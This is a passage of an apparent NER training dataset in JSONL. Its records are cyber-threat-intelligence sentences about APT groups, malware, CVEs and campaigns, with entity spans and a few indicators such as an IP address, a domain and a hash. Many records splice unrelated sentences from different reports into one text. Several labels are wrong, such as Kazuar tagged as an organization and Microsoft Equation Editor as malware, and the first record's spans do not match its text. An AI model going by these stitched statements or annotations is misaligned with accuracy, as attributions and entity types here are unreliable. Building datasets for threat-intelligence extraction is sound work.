Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 .", "spans": {"VULNERABILITY: CVE-2012-0158": [[151, 164]], "TOOL: NetTraveler Trojan": [[176, 194]], "THREAT_ACTOR: OilRig": [[218, 224]]}, "info": {"id": "cyberner_stix_train_004548", "source": "cyberner_stix_train"}} {"text": "Moving laterally through a network relying only on legitimate tools that already exist within the victims ’ systems , at times forgoing their traditional toolset for the duration of the compromise .", "spans": {}, "info": {"id": "cyberner_stix_train_004549", "source": "cyberner_stix_train"}} {"text": "However it ’ s unclear whether organizations that later reported on ViperRAT performed their own independent research or simply based their content on the original Israeli report . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms . First , it checks if the DLL is executed as a service . 
Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": {"MALWARE: ViperRAT": [[68, 76]], "ORGANIZATION: Kazuar": [[309, 315]], "TOOL: DLL": [[366, 369]]}, "info": {"id": "cyberner_stix_train_004550", "source": "cyberner_stix_train"}} {"text": "The threat actors then move quickly to compromise Microsoft Exchange servers and to gain complete control of the target environment .", "spans": {"ORGANIZATION: Microsoft": [[50, 59]], "TOOL: Exchange": [[60, 68]]}, "info": {"id": "cyberner_stix_train_004551", "source": "cyberner_stix_train"}} {"text": "Its main capabilities include : Stealing personal device information Intercepting SMS messages Recording targeted applications for one-time password ( TAN ) Lockdown of the phone Stealing pictures from the device Self-destruction and removal As banks release more advanced security measures , banking malware evolves to keep up with the perpetual arms race . The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email .", "spans": {"VULNERABILITY: exploit": [[363, 370]], "THREAT_ACTOR: Silence’s": [[380, 389]], "THREAT_ACTOR: OilRig": [[471, 477]], "MALWARE: OopsIE Trojan": [[512, 525]]}, "info": {"id": "cyberner_stix_train_004552", "source": "cyberner_stix_train"}} {"text": "The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: TG-4127": [[35, 42]], "TOOL: email": [[298, 303]]}, "info": {"id": "cyberner_stix_train_004553", "source": "cyberner_stix_train"}} {"text": "jp.co.sagawa.SagawaOfficialApp 佐川急便 Malicious URLs : hxxp : //38 [ . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . The send function uses several counters to maintain various pieces of information used to control the flow of . shellcode Download a shellcode and run by injecting it in a target process .", "spans": {"ORGANIZATION: CTU": [[69, 72]], "THREAT_ACTOR: group": [[126, 131]], "MALWARE: shellcode": [[353, 362]]}, "info": {"id": "cyberner_stix_train_004554", "source": "cyberner_stix_train"}} {"text": "These modules are used to selectively provide CozyDuke with just the functionality deemed necessary for the mission at hand .", "spans": {"MALWARE: CozyDuke": [[46, 54]]}, "info": {"id": "cyberner_stix_train_004555", "source": "cyberner_stix_train"}} {"text": "The time bomb triggers unpacker thread . We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. 
We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": {"VULNERABILITY: zero-day": [[95, 103]], "THREAT_ACTOR: TEMP.Reaper": [[151, 162]], "MALWARE: PIVY": [[235, 239]], "FILEPATH: malicious files": [[463, 478]]}, "info": {"id": "cyberner_stix_train_004556", "source": "cyberner_stix_train"}} {"text": "It is safe to say that today ’ s cybercriminal is no longer a lone hacker but part of a serious business operation . we detected an ongoing campaign targeting a national data center in the Centeral Asia . It is also known for having compromised various targets in the healthcare and education sectors . The attackers first attempted to use the LockBit ransomware but when that was blocked , they resorted to 3AM instead .", "spans": {"THREAT_ACTOR: attackers": [[307, 316]], "MALWARE: LockBit ransomware": [[344, 362]], "MALWARE: 3AM": [[408, 411]]}, "info": {"id": "cyberner_stix_train_004557", "source": "cyberner_stix_train"}} {"text": "XENOTIME is easily the most dangerous threat activity publicly known .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]]}, "info": {"id": "cyberner_stix_train_004558", "source": "cyberner_stix_train"}} {"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . 
Execute a command through exploits for CVE-2018-0802 .", "spans": {"VULNERABILITY: CVE-2017-1182": [[87, 100]], "MALWARE: Microsoft Equation Editor": [[118, 143]], "MALWARE: EQNEDT32.exe": [[146, 158]], "VULNERABILITY: CVE-2018-0802": [[249, 262]]}, "info": {"id": "cyberner_stix_train_004559", "source": "cyberner_stix_train"}} {"text": "The product information in the builder kit matched with this individual ’s YouTube username and the YouTube channel .", "spans": {"ORGANIZATION: YouTube": [[75, 82], [100, 107]]}, "info": {"id": "cyberner_stix_train_004560", "source": "cyberner_stix_train"}} {"text": "Found bundled with a repackaged app , the spyware ’ s surveillance capabilities involve hiding its presence on the device , recording phone calls , logging incoming text messages , recoding videos , taking pictures and collecting GPS coordinates , then broadcasting all of that to an attacker-controlled C & C ( command and control ) server . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": {"SYSTEM: GPS": [[230, 233]], "THREAT_ACTOR: SectorJ04": [[365, 374]], "MALWARE: Carbanak": [[657, 665]]}, "info": {"id": "cyberner_stix_train_004561", "source": "cyberner_stix_train"}} {"text": "Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China . 
APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": {"ORGANIZATION: Anomali": [[199, 206]], "THREAT_ACTOR: APT33": [[422, 427]], "ORGANIZATION: aviation": [[440, 448]], "ORGANIZATION: military": [[512, 520], [597, 605]]}, "info": {"id": "cyberner_stix_train_004562", "source": "cyberner_stix_train"}} {"text": "This means that untrusted software may not be allowed to run unless it is signed .", "spans": {}, "info": {"id": "cyberner_stix_train_004563", "source": "cyberner_stix_train"}} {"text": "When rooting fails , a second component delivers a fake system update notification in hopes of tricking users into granting HummingBad system-level permissions . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 . APT33 : 64.251.19.215 [REDACTED].myftp.org . 
The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": {"MALWARE: HummingBad": [[124, 134]], "TOOL: WannaCry": [[162, 170]], "TOOL: WCry": [[187, 191]], "TOOL: WanaCryptor": [[195, 206]], "TOOL: ransomware": [[253, 263]], "ORGANIZATION: Microsoft": [[365, 374]], "TOOL: Server Message Block": [[378, 398]], "TOOL: SMB": [[401, 404]], "THREAT_ACTOR: APT33": [[429, 434]], "IP_ADDRESS: 64.251.19.215": [[437, 450]], "DOMAIN: [REDACTED].myftp.org": [[451, 471]], "THREAT_ACTOR: The group 's 91 attacks": [[474, 497]], "MALWARE: nasty zero - day": [[610, 626]]}, "info": {"id": "cyberner_stix_train_004564", "source": "cyberner_stix_train"}} {"text": "SHA256 Package Name App Name a6c7351b09a733a1b3ff8a0901c5bde fdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox 备份 ( Backup ) Table 3 HenBox variant used in description Once this variant of HenBox is installed on the victim ’ s device , the app can be executed in two different ways : One method for executing HenBox is for the victim to launch the malicious app ( named “ Backup ” , in Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . 
While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": {"MALWARE: HenBox": [[136, 142], [192, 198], [312, 318]], "THREAT_ACTOR: APT41": [[402, 407]], "ORGANIZATION: telecommunications companies": [[434, 462]], "THREAT_ACTOR: TG-4127": [[560, 567]], "ORGANIZATION: Russian government": [[798, 816]]}, "info": {"id": "cyberner_stix_train_004565", "source": "cyberner_stix_train"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]]}, "info": {"id": "cyberner_stix_train_004566", "source": "cyberner_stix_train"}} {"text": "In this version , the developer added more classes from the same package . some indications of loosely linked activity dating back to at least 2013 . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . 
WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": {"MALWARE: RIPTIDE": [[161, 168]], "THREAT_ACTOR: APT12": [[181, 186]], "MALWARE: HIGHTIDE": [[215, 223]], "ORGANIZATION: Microsoft": [[232, 241]], "TOOL: Word": [[242, 246]], "FILEPATH: .doc": [[249, 253]], "VULNERABILITY: CVE-2012-0158": [[279, 292]], "MALWARE: WIRTE": [[295, 300]], "SYSTEM: HTTPS": [[310, 315]], "MALWARE: C2.ZxShell": [[345, 355]]}, "info": {"id": "cyberner_stix_train_004567", "source": "cyberner_stix_train"}} {"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware . The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf.exe as the only content of the ZIP . 
However , lessons learned this year can help organizations take proactive steps to protect themselves from ransomware in 2023 .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Desert Scorpion": [[93, 108]], "SYSTEM: Google Play Store": [[116, 133]], "THREAT_ACTOR: HIDDEN COBRA actors": [[167, 186]], "TOOL: DDoS botnets": [[195, 207]], "TOOL: keyloggers": [[210, 220]], "TOOL: remote access tools": [[223, 242]], "TOOL: RATs": [[245, 249]], "TOOL: wiper malware": [[258, 271]], "TOOL: PowerArchiver 2019": [[297, 315]], "TOOL: WinRar": [[320, 326]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.exe": [[375, 409]]}, "info": {"id": "cyberner_stix_train_004568", "source": "cyberner_stix_train"}} {"text": "The loaders associated with the PinchDuke toolset have also been observed being used with CosmicDuke .", "spans": {"TOOL: loaders": [[4, 11]], "MALWARE: PinchDuke": [[32, 41]], "MALWARE: CosmicDuke": [[90, 100]]}, "info": {"id": "cyberner_stix_train_004569", "source": "cyberner_stix_train"}} {"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . 
In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": {"TOOL: NetWire": [[0, 7]], "TOOL: DarkComet": [[10, 19]], "TOOL: NanoCore": [[22, 30]], "TOOL: LuminosityLink": [[33, 47]], "TOOL: Remcos": [[50, 56]], "TOOL: Imminent Monitor": [[61, 77]], "ORGANIZATION: telecoms companies": [[238, 256]], "ORGANIZATION: customers": [[282, 291]]}, "info": {"id": "cyberner_stix_train_004570", "source": "cyberner_stix_train"}} {"text": "This final payload was designed to run only on certain systems .", "spans": {}, "info": {"id": "cyberner_stix_train_004571", "source": "cyberner_stix_train"}} {"text": "APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: spanning multiple industries": [[35, 63]], "MALWARE: ICEFOG": [[239, 245]], "ORGANIZATION: government organizations": [[261, 285]], "ORGANIZATION: defense industry": [[290, 306]]}, "info": {"id": "cyberner_stix_train_004572", "source": "cyberner_stix_train"}} {"text": "The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . 
Both of these samples work as Banking Trojans and provide similar functionalities .", "spans": {"MALWARE: backdoor": [[4, 12]], "MALWARE: Banking Trojans": [[133, 148]]}, "info": {"id": "cyberner_stix_train_004573", "source": "cyberner_stix_train"}} {"text": "This once more highlights two crucial behavioral elements of the Dukes group .", "spans": {"THREAT_ACTOR: Dukes": [[65, 70]]}, "info": {"id": "cyberner_stix_train_004574", "source": "cyberner_stix_train"}} {"text": "Implementing input validation can protect against the security flaws of web applications by significantly reducing the probability of successful exploitation .", "spans": {}, "info": {"id": "cyberner_stix_train_004575", "source": "cyberner_stix_train"}} {"text": "Interestingly , we found other DNS records mostly from 2017 that follow a similar pattern and appear to contain two-letters codes for districts in Italy : Server City server1bo.exodus.connexxa [ . Additionally , the actor possibly gained a foothold on other target networks—beyond the two intrusions discussed in this post – using similar strategies . A shortcut is added to the the startup folder : C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup . Indicators of compromise IOCs are pieces of forensic data , such as data found in system log entries or files , that identify potentially malicious activity on a system or network .", "spans": {}, "info": {"id": "cyberner_stix_train_004576", "source": "cyberner_stix_train"}} {"text": "This may also explain the timing in between the apps becoming fully functional and “ incubation. ” As this is a group we have not observed before , we will continue monitoring this campaign for further developments . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . it updates the CFG and the destination of the instruction . 
This also ties into the fact that cyber criminals are competitive by nature , and they love the challenge their actions bring .", "spans": {"THREAT_ACTOR: GCMAN group": [[221, 232]], "ORGANIZATION: banks": [[250, 255]], "ORGANIZATION: budgeting": [[281, 290]], "ORGANIZATION: accounting departments": [[295, 317]], "THREAT_ACTOR: cyber criminals": [[502, 517]]}, "info": {"id": "cyberner_stix_train_004577", "source": "cyberner_stix_train"}} {"text": "TRISIS was an escalation of the type of attacks historically targeting ICS systems .", "spans": {"MALWARE: TRISIS": [[0, 6]], "TOOL: ICS": [[71, 74]]}, "info": {"id": "cyberner_stix_train_004578", "source": "cyberner_stix_train"}} {"text": "The author has introduced the capability to grant the app the device admin permission . That attack was attributed to perpetrators Kaspersky called the Winnti Group . Invader ( a.k.a Kickesgo ) is a backdoor that injects its main code into a legitimate process , such as explorer.exe , and has following functions :", "spans": {"ORGANIZATION: Kaspersky": [[131, 140]], "THREAT_ACTOR: Winnti Group": [[152, 164]], "MALWARE: Invader": [[167, 174]], "MALWARE: Kickesgo": [[183, 191]], "FILEPATH: explorer.exe": [[271, 283]]}, "info": {"id": "cyberner_stix_train_004579", "source": "cyberner_stix_train"}} {"text": "In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso . 
Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"ORGANIZATION: users": [[135, 140]], "MALWARE: Carbanak": [[159, 167]], "ORGANIZATION: consumer": [[235, 243]], "MALWARE: Carberp": [[335, 342]]}, "info": {"id": "cyberner_stix_train_004580", "source": "cyberner_stix_train"}} {"text": "Some example file names using this technique include : AntiVirus_update_package.7z , acquisition.7z , offer.7z , update_flashplayer10ax.7z .", "spans": {"FILEPATH: AntiVirus_update_package.7z": [[55, 82]], "FILEPATH: acquisition.7z": [[85, 99]], "FILEPATH: offer.7z": [[102, 110]], "FILEPATH: update_flashplayer10ax.7z": [[113, 138]]}, "info": {"id": "cyberner_stix_train_004581", "source": "cyberner_stix_train"}} {"text": "( control the vibrator ) ∗ android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) ∗ android.permission.WRITE_SMS ( edit/delete SMS ) ∗ android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) ∗ android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) ∗ android.permission.GET_TASKS ( retrieve running applications ) ∗ android.permission.CALL_PHONE ( call phone numbers ) One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on . The threat posed by ZxShell to organizations is one that cannot be ignored . 
A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {"ORGANIZATION: Pension Service": [[469, 484]], "ORGANIZATION: government": [[532, 542]], "ORGANIZATION: government agencies": [[547, 566]], "ORGANIZATION: local governments": [[569, 586]], "ORGANIZATION: public interest groups": [[589, 611]], "ORGANIZATION: universities": [[614, 626]], "ORGANIZATION: banks": [[629, 634]], "ORGANIZATION: financial services": [[637, 655]], "ORGANIZATION: energy": [[658, 664]], "MALWARE: ZxShell": [[697, 704]]}, "info": {"id": "cyberner_stix_train_004582", "source": "cyberner_stix_train"}} {"text": "Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands , but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date .", "spans": {"MALWARE: HammerDuke": [[5, 15], [120, 130]], "TOOL: C&C": [[50, 53]], "TOOL: Twitter": [[188, 195]]}, "info": {"id": "cyberner_stix_train_004583", "source": "cyberner_stix_train"}} {"text": "] it Reggio Calabria server2ct.exodus.connexxa [ . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity . 
cname : Combating malware , ransomware , and malicious cyber attacks has always relied on information sharing , exposure of actors TTPs and the dissemination of reliable threat intelligence so that security professionals can quickly develop mitigations , remediations , and update their defenses to block future attacks .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[102, 112], [269, 279]], "THREAT_ACTOR: CNIIHM": [[195, 201]], "ORGANIZATION: research organization": [[214, 235]]}, "info": {"id": "cyberner_stix_train_004584", "source": "cyberner_stix_train"}} {"text": "Specifically , the techniques CosmicDuke uses to extract user credentials from targeted software and to detect the presence of analysis tools appear to be based on the techniques used by PinchDuke .", "spans": {"MALWARE: CosmicDuke": [[30, 40]], "MALWARE: PinchDuke": [[187, 196]]}, "info": {"id": "cyberner_stix_train_004586", "source": "cyberner_stix_train"}} {"text": "Android documentation describes that function as \" a global action . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Rancor : Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia . 
The ransom note is also used to generate a message in the form of the background wallpaper typically located at “ C:/Users / Public / bg.jpg ” .", "spans": {"SYSTEM: Android": [[0, 7]], "TOOL: PIVY": [[139, 143]], "MALWARE: malicious files": [[367, 382]], "THREAT_ACTOR: Rancor": [[385, 391]]}, "info": {"id": "cyberner_stix_train_004587", "source": "cyberner_stix_train"}} {"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran .", "spans": {"TOOL: WannaCry": [[42, 50]], "TOOL: WCry": [[57, 61]], "TOOL: WanaCrypt0r": [[69, 80]], "ORGANIZATION: telecommunications": [[258, 276]], "ORGANIZATION: shipping": [[279, 287]], "ORGANIZATION: car manufacturers": [[290, 307]], "ORGANIZATION: universities": [[310, 322]], "ORGANIZATION: health care industries": [[327, 349]]}, "info": {"id": "cyberner_stix_train_004588", "source": "cyberner_stix_train"}} {"text": "Cerberus embeds the following set of features that allows itself to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( Local injects obtained from C2 ) Keylogging SMS harvesting : SMS listing SMS harvesting : SMS forwarding Device info collection Contact list collection Application listing Location collection Overlaying : Targets list update SMS : Sending Calls : USSD request making Calls : Call forwarding Remote actions : App installing Remote actions : App starting Remote 
actions : App removal Remote actions : Showing arbitrary web pages Remote actions : Screen-locking Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . Secureworks® incident responders and Counter Threat Unit™ ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People .", "spans": {"MALWARE: Cerberus": [[0, 8]], "THREAT_ACTOR: SectorJ04": [[621, 630]], "ORGANIZATION: Secureworks®": [[804, 816]], "ORGANIZATION: CTU": [[864, 867]], "THREAT_ACTOR: BRONZE BUTLER": [[926, 939]], "THREAT_ACTOR: Tick": [[956, 960]]}, "info": {"id": "cyberner_stix_train_004589", "source": "cyberner_stix_train"}} {"text": "In comparison , even the earliest known GeminiDuke samples encrypted any strings that might have given away the malware ’s true nature .", "spans": {"MALWARE: GeminiDuke": [[40, 50]]}, "info": {"id": "cyberner_stix_train_004590", "source": "cyberner_stix_train"}} {"text": "It uses “ 185.51.201 [ . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . ScarCruft tools : C781f5fad9b47232b3606e4d374900cd Installer .", "spans": {"ORGANIZATION: welivesecurity": [[71, 85]], "THREAT_ACTOR: Buhtrap": [[118, 125]], "THREAT_ACTOR: ScarCruft": [[128, 137]], "FILEPATH: C781f5fad9b47232b3606e4d374900cd": [[146, 178]], "TOOL: Installer": [[179, 188]]}, "info": {"id": "cyberner_stix_train_004591", "source": "cyberner_stix_train"}} {"text": "We named this malware \" WolfRAT '' due to strong links between this malware ( and the command and control ( C2 ) infrastructure ) and Wolf Research , an infamous organization that developed interception and espionage-based malware and was publicly described by CSIS during Virus Bulletin 2018 . 
In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD . The emails are often tailored for specific victims and contain malicious attachments that are almost always “ weaponized ” .PDF files with known exploits that drop malware executables onto targeted systems . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": {"MALWARE: WolfRAT": [[24, 31]], "ORGANIZATION: Wolf Research": [[134, 147]], "TOOL: Winnti malware": [[325, 339]], "THREAT_ACTOR: BARIUM": [[385, 391]], "TOOL: emails": [[407, 413]], "FILEPATH: .PDF": [[526, 530]]}, "info": {"id": "cyberner_stix_train_004592", "source": "cyberner_stix_train"}} {"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” . Wapack labs also observed a similar sample targeting Japan in November .", "spans": {"MALWARE: Softether VPN 4.12”": [[118, 137]], "MALWARE: psiphon3”": [[142, 151]], "MALWARE: Microsoft Office activators”": [[157, 185]], "ORGANIZATION: Wapack": [[188, 194]]}, "info": {"id": "cyberner_stix_train_004593", "source": "cyberner_stix_train"}} {"text": "This certificate configuration is ignored by the malware .", "spans": {}, "info": {"id": "cyberner_stix_train_004594", "source": "cyberner_stix_train"}} {"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . 
As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": {"VULNERABILITY: zero-day": [[54, 62]], "THREAT_ACTOR: TEMP.Reaper": [[110, 121]], "FILEPATH: decoy files": [[190, 201]]}, "info": {"id": "cyberner_stix_train_004595", "source": "cyberner_stix_train"}} {"text": "Most components are obfuscated in some way , whether it be simple XOR with a single-byte key , or through the use of ZIP or Zlib compression wrapped with RC4 encryption . Since 2017 , APT41's activities have included a series of supply chain compromises . We assess that APT28 is most likely sponsored by the Russian government .", "spans": {"SYSTEM: ZIP": [[117, 120]], "SYSTEM: Zlib": [[124, 128]], "THREAT_ACTOR: APT41's": [[184, 191]], "THREAT_ACTOR: APT28": [[271, 276]], "ORGANIZATION: Russian government": [[309, 327]]}, "info": {"id": "cyberner_stix_train_004596", "source": "cyberner_stix_train"}} {"text": "Criminals are increasingly using obfuscation , the deliberate act of creating complex code to make it difficult to analyze . LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . The difference between the original and patched hpqhvind.exe . 
Paired with KillNet ’s reported compromise and leak of North Atlantic Treaty Organization ( NATO ) documents , this sudden increase in capability could indicate significant investment from more sophisticated actors , particularly when measured against KillNet ’s capabilities since the collective ’s inception in late 2021 .", "spans": {"ORGANIZATION: Dell SecureWorks": [[192, 208]], "FILEPATH: hpqhvind.exe": [[418, 430]]}, "info": {"id": "cyberner_stix_train_004597", "source": "cyberner_stix_train"}} {"text": "New malware is often introduced to underground communities by being promoted and sold or offered as a giveaway . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) .", "spans": {"MALWARE: TajMahal": [[132, 140]], "ORGANIZATION: Kaspersky": [[175, 184]], "THREAT_ACTOR: Rocket Kitten group": [[262, 281]], "ORGANIZATION: Trend Micro": [[371, 382]], "ORGANIZATION: ClearSky": [[387, 395]]}, "info": {"id": "cyberner_stix_train_004598", "source": "cyberner_stix_train"}} {"text": "PLATINUM has used several zero-day exploits against their victims . Execute a command through exploits for CVE-2017-11882 .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[26, 43]], "VULNERABILITY: CVE-2017-11882": [[107, 121]]}, "info": {"id": "cyberner_stix_train_004599", "source": "cyberner_stix_train"}} {"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . 
Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": {"MALWARE: Canhadr/Ndriver": [[29, 44]], "THREAT_ACTOR: Gaza Cybergang Group1": [[347, 368]], "ORGANIZATION: embassies": [[379, 388]], "ORGANIZATION: political personnel": [[393, 412]]}, "info": {"id": "cyberner_stix_train_004600", "source": "cyberner_stix_train"}} {"text": "To successfully interact with the web shell , a threat actor sent HTTP requests that included the \"|\" parameter .", "spans": {}, "info": {"id": "cyberner_stix_train_004601", "source": "cyberner_stix_train"}} {"text": "In one sample , no SMS-related code appears in the DEX file , but there is a native method registered . Over the summer they compromised several sites , including a well-known Uyghur website written in that native language . End Terminate ZxShell DLL . In terms of the fallout , it ’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": {"MALWARE: ZxShell": [[239, 246]], "TOOL: DLL": [[247, 250]], "THREAT_ACTOR: Cl0p": [[314, 318]], "VULNERABILITY: zero - day": [[351, 361]]}, "info": {"id": "cyberner_stix_train_004602", "source": "cyberner_stix_train"}} {"text": "The Flash exploit is served from unobfuscated HTML/JS .", "spans": {"TOOL: Flash": [[4, 9]], "TOOL: HTML/JS": [[46, 53]]}, "info": {"id": "cyberner_stix_train_004603", "source": "cyberner_stix_train"}} {"text": "Dynamic code loading makes it impossible to state what kind of PHA it was . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string , as shown in Figure 2 . 
• New , unexpected compiled ASPX files in the directory • Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": {"TOOL: User-Agent": [[323, 333]], "SYSTEM: Exchange Servers": [[588, 604]]}, "info": {"id": "cyberner_stix_train_004604", "source": "cyberner_stix_train"}} {"text": "Encrypt the collected data and send it to the attackers over the HTTP protocol .", "spans": {}, "info": {"id": "cyberner_stix_train_004605", "source": "cyberner_stix_train"}} {"text": "Based on this information it can be concluded that espionage actors used this individual ’s modified version of njRAT in this cyber attack .", "spans": {"MALWARE: njRAT": [[112, 117]]}, "info": {"id": "cyberner_stix_train_004606", "source": "cyberner_stix_train"}} {"text": "For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild .", "spans": {"THREAT_ACTOR: threat actor": [[99, 111]], "ORGANIZATION: security community": [[383, 401]], "MALWARE: ICS": [[405, 408]], "MALWARE: malware": [[409, 416]]}, "info": {"id": "cyberner_stix_train_004607", "source": "cyberner_stix_train"}} {"text": "This class is based on public code belonging to the package praeda.muzikmekan , which can be found here among other places . registrant information points to activity possibly as early as 2011 . 
